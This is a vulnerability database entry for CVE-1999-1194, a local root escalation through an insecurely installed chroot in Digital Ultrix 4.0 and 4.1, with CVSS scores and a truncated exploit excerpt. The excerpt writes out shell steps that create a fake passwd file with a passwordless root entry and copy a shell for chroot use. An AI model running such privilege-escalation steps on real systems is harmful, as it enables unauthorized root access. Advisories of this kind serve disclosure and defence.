7.2
CVSSv2

CVE-1999-1194

Published: 01/05/1991 Updated: 10/10/2017
CVSS v2 Base Score: 7.2 | Impact Score: 10 | Exploitability Score: 3.9
VMScore: 725
Vector: AV:L/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

chroot in Digital Ultrix 4.1 and 4.0 is insecurely installed, which allows local users to gain privileges.

Vulnerable Product Search on Vulmon Subscribe to Product

digital ultrix 4.0

digital ultrix 4.1

Exploits

source: wwwsecurityfocuscom/bid/17/info By default, /usr/bin/chroot is improperly installed in Ultrix versions 40 and 41 Anyone can execute /usr/bin/chroot this can lead to system users to gain unauthorized privileges $ mkdir /tmp/etc $ echo root::0:0::/:/bin/sh > /tmp/etc/passwd $ mkdir /tmp/bin $ cp /bin/sh /tmp/bin/sh $ cp /bin ...